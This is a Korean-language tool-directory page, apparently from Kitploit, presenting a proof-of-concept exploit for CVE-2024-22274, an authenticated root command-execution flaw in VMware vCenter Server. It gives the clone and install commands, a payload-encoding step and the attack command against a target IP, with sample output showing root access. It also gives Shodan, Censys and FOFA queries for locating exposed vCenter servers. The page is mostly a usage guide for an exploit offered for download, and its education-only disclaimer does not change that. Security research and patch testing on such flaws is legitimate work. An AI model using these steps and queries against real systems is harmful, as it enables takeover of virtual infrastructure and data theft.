Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2024-22274-RCE — PoC - VMware vCenter Server에서 인증된 원격 코드 실행 (Exploit) | Kitploit
도구/GitHubGitHub/l0n3m4n/cve-2024-22274-rce
Privilege EscalationVulnerability AnalysisExploitationPenetration TestingCommand and ControlRed Teaming
GitHubl0n3m4n/cve-2024-22274-rce

CVE-2024-22274-RCE

PoC - VMware vCenter Server에서 인증된 원격 코드 실행 (Exploit)

저장소 보기
4562년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

권한 상승: VMware vCenter Server 인증된 RCE

Facebook X Medium Python Kali

📜 설명

"com.vmware.appliance.recovery.backup.job.create" 및 "com.vmware.appliance.recovery.backup.validate" API 구성 요소는 플래그 인젝션 공격에 취약하며, 이를 이용해 대상 시스템에서 root 사용자로 임의 명령어를 실행할 수 있습니다."

📚 목차

  • 📜 설명
  • 🛠️ 설치
  • ⚙️ 사용법
  • 🔎 발견
  • 📝 참고사항
  • 💁 참고자료
  • 📢 면책 조항

🛠️ 설치 및 설정

[!NOTE] 이 PoC 익스플로잇을 사용하려면 유효한 자격 증명이 있어야 하며 SSH를 통해 VMware vCenter Server 셸에 로그인해야 합니다. 사용자는 vcenter_creds.txt 파일에 명시된 대로 "admin" 역할을 가져야 합니다.

root@kitploit:~
$ git clone https://github.com/l0n3m4n/CVE-2024-22274-RCE.git
$ cd CVE-2024-22274-RCE 
$ python3 -m venv venv && source venv/bin/activate
$ pip install -r requirements.txt 

user2base64.sh를 실행하거나 수정하여 새 사용자를 base64로 인코딩하고 자동으로 payload.txt를 생성합니다.

root@kitploit:~

$ bash user2base64.sh
Payload has been encoded to base64, saved payload.txt                                 

⚙️ 사용법

VMware-vCenter

취약한 버전

vulnerable-version

성공적인 실행 및 익스플로잇

root@kitploit:~
$ python3 CVE-2024-22274-RCE.py -t 192.168.56.103 -P 22 -p payload.txt -c vCenter_creds.txt
 ___ ___ _______                                          ______               __              
|   |   |   |   |.--.--.--.---.-.----.-----.______.--.--.|      |.-----.-----.|  |_.-----.----.
|   |   |       ||  |  |  |  _  |   _|  -__|______|  |  ||   ---||  -__|     ||   _|  -__|   _|
 \_____/|__|_|__||________|___._|__| |_____|       \___/ |______||_____|__|__||____|_____|__|  
    
                Author: l0n3m4n | vCenter RCE: CVE-2024-22274 | PoC: @mbadanoiu
                                                                              
[+] Connected to 192.168.56.103 via SSH
[+] Payload executed successfully. Output: 
   uid=0(root) gid=0(root) groups=0(root)

[+] Exploitation successful: You have root access.
[+] Finished executing commands on 192.168.56.103

성공적으로 실행되었으나 Root 권한 획득 실패

이 예시는 연결은 되었으나 페이로드가 올바르게 구성되지 않았거나 로드되지 않은 경우입니다. 자세한 내용은 PDF PoC를 참조하세요.

root@kitploit:~
 ___ ___ _______                                          ______               __              
|   |   |   |   |.--.--.--.---.-.----.-----.______.--.--.|      |.-----.-----.|  |_.-----.----.
|   |   |       ||  |  |  |  _  |   _|  -__|______|  |  ||   ---||  -__|     ||   _|  -__|   _|
 \_____/|__|_|__||________|___._|__| |_____|       \___/ |______||_____|__|__||____|_____|__|  
    
                Author: l0n3m4n | vCenter RCE: CVE-2024-22274 | PoC: @mbadanoiu
                                                                              
[+] Connected to 192.168.56.103 via SSH
[+] Payload executed successfully. Output: 
   No privileges escalation detected.

[+] Exploitation failed: Root access not obtained.
[+] Finished executing commands on 192.168.56.103

설정 파일에서 사용자 이름 또는 비밀번호 누락

root@kitploit:~
 ___ ___ _______                                          ______               __              
|   |   |   |   |.--.--.--.---.-.----.-----.______.--.--.|      |.-----.-----.|  |_.-----.----.
|   |   |       ||  |  |  |  _  |   _|  -__|______|  |  ||   ---||  -__|     ||   _|  -__|   _|
 \_____/|__|_|__||________|___._|__| |_____|       \___/ |______||_____|__|__||____|_____|__|  
    
                Author: l0n3m4n | vCenter RCE: CVE-2024-22274 | PoC: @mbadanoiu
                                                                              
[-] Error: Username or password not found in configuration file.

연결 실패 또는 SSH 오류

호스트 주소와 자격 증명을 확인하세요.

root@kitploit:~
 ___ ___ _______                                          ______               __              
|   |   |   |   |.--.--.--.---.-.----.-----.______.--.--.|      |.-----.-----.|  |_.-----.----.
|   |   |       ||  |  |  |  _  |   _|  -__|______|  |  ||   ---||  -__|     ||   _|  -__|   _|
 \_____/|__|_|__||________|___._|__| |_____|       \___/ |______||_____|__|__||____|_____|__|  
    
                Author: l0n3m4n | vCenter RCE: CVE-2024-22274 | PoC: @mbadanoiu
                                                                              
[-] Error: [SSH Error] Connection to 192.168.56.103 failed.

🔎 발견

  • CENSYS: "VMware vCenter", 필터: services.port: 443 AND tags: "VMware"
  • FOFA: title="VMware vCenter", 필터: port="443" && title="VMware vCenter"
  • SHODAN: "VMware vCenter", 필터: port:443 "VMware vCenter"

📝 참고사항

이 PoC 익스플로잇은 스크립트를 해석하는 방법을 이해하지 못하면 효과적이지 않습니다. 의도적으로 "스크립트 키디"들이 이해 없이 단순히 복사하여 실행하는 것을 방지하기 위해 수정되었습니다. VMware vCenter Server는 가상화 환경 관리의 핵심 구성 요소이며, 누군가 이에 접근하면 가상 인프라에 대한 완전한 제어권을 얻고 민감한 데이터를 유출할 수 있습니다. 이 PoC는 올바르게 사용할 수 있는 작은 기술적 전문성을 가진 사람들을 위해 설계되었습니다. 따라서 영향을 이해하지 못하고 혼란을 일으키려는 스크립트 키디라면 이 익스플로잇은 유용하지 않을 것입니다.

💁 참고자료

  • http://www.vmware.com/security/advisories
  • https://nvd.nist.gov/vuln/detail/CVE-2024-22274
  • https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-202405-4049
  • https://bdu.fstec.ru/vul/2024-05108
  • https://github.com/advisories/GHSA-xm44-79f8-q8r7

📢 면책 조항

이 도구는 교육 및 연구 목적으로만 제공됩니다. 제작자는 도구의 오용이나 손해에 대해 어떠한 책임도 지지 않습니다. 이슈 생성

도구 다운로드